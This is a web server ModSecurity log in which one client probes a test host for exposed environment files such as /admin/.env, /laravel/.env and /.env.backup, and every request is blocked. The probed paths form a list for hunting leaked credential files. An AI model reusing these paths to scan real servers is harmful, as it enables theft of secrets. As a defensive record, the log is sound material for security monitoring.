[Sun Mar 15 10:46:53.844393 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "abaADWAJ710PJa37ZB3yTgAAAAM"]
[Sun Mar 15 10:46:53.866489 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abaADWAJ710PJa37ZB3yTwAAAAM"]
[Sun Mar 15 10:46:53.866666 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abaADWAJ710PJa37ZB3yTwAAAAM"]
[Sun Mar 15 10:46:53.866800 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abaADWAJ710PJa37ZB3yTwAAAAM"]
[Sun Mar 15 10:46:53.889793 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "abaADWAJ710PJa37ZB3yUAAAAAM"]
[Sun Mar 15 10:46:53.889983 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "abaADWAJ710PJa37ZB3yUAAAAAM"]
[Sun Mar 15 10:46:53.890117 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "abaADWAJ710PJa37ZB3yUAAAAAM"]
[Sun Mar 15 10:46:53.912307 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "abaADWAJ710PJa37ZB3yUQAAAAM"]
[Sun Mar 15 10:46:53.912490 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "abaADWAJ710PJa37ZB3yUQAAAAM"]
[Sun Mar 15 10:46:53.912622 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "abaADWAJ710PJa37ZB3yUQAAAAM"]
[Sun Mar 15 10:46:53.935190 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "abaADWAJ710PJa37ZB3yUgAAAAM"]
[Sun Mar 15 10:46:53.935390 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "abaADWAJ710PJa37ZB3yUgAAAAM"]
[Sun Mar 15 10:46:53.935518 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "abaADWAJ710PJa37ZB3yUgAAAAM"]
[Sun Mar 15 10:46:53.957799 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "abaADWAJ710PJa37ZB3yUwAAAAM"]
[Sun Mar 15 10:46:53.957995 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "abaADWAJ710PJa37ZB3yUwAAAAM"]
[Sun Mar 15 10:46:53.958126 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "abaADWAJ710PJa37ZB3yUwAAAAM"]
[Sun Mar 15 10:46:53.980685 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "abaADWAJ710PJa37ZB3yVAAAAAM"]
[Sun Mar 15 10:46:53.980890 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "abaADWAJ710PJa37ZB3yVAAAAAM"]
[Sun Mar 15 10:46:53.981052 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "abaADWAJ710PJa37ZB3yVAAAAAM"]
[Sun Mar 15 10:46:54.003132 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "abaADmAJ710PJa37ZB3yVQAAAAM"]
[Sun Mar 15 10:46:54.003337 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "abaADmAJ710PJa37ZB3yVQAAAAM"]
[Sun Mar 15 10:46:54.003464 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "abaADmAJ710PJa37ZB3yVQAAAAM"]
[Sun Mar 15 10:46:54.025655 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "abaADmAJ710PJa37ZB3yVgAAAAM"]
[Sun Mar 15 10:46:54.025821 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "abaADmAJ710PJa37ZB3yVgAAAAM"]
[Sun Mar 15 10:46:54.025941 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "abaADmAJ710PJa37ZB3yVgAAAAM"]
[Sun Mar 15 10:46:54.047925 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "abaADmAJ710PJa37ZB3yVwAAAAM"]
[Sun Mar 15 10:46:54.048093 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "abaADmAJ710PJa37ZB3yVwAAAAM"]
[Sun Mar 15 10:46:54.048215 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "abaADmAJ710PJa37ZB3yVwAAAAM"]
[Sun Mar 15 10:46:54.070125 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abaADmAJ710PJa37ZB3yWAAAAAM"]
[Sun Mar 15 10:46:54.070370 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abaADmAJ710PJa37ZB3yWAAAAAM"]
[Sun Mar 15 10:46:54.070524 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abaADmAJ710PJa37ZB3yWAAAAAM"]
[Sun Mar 15 10:46:54.070643 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abaADmAJ710PJa37ZB3yWAAAAAM"]
[Sun Mar 15 10:46:54.092762 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "abaADmAJ710PJa37ZB3yWQAAAAM"]
[Sun Mar 15 10:46:54.092956 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "abaADmAJ710PJa37ZB3yWQAAAAM"]
[Sun Mar 15 10:46:54.093107 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "abaADmAJ710PJa37ZB3yWQAAAAM"]
[Sun Mar 15 10:46:54.114905 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "abaADmAJ710PJa37ZB3yWgAAAAM"]
[Sun Mar 15 10:46:54.115129 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "abaADmAJ710PJa37ZB3yWgAAAAM"]
[Sun Mar 15 10:46:54.115286 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "abaADmAJ710PJa37ZB3yWgAAAAM"]
[Sun Mar 15 10:46:54.115403 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "abaADmAJ710PJa37ZB3yWgAAAAM"]
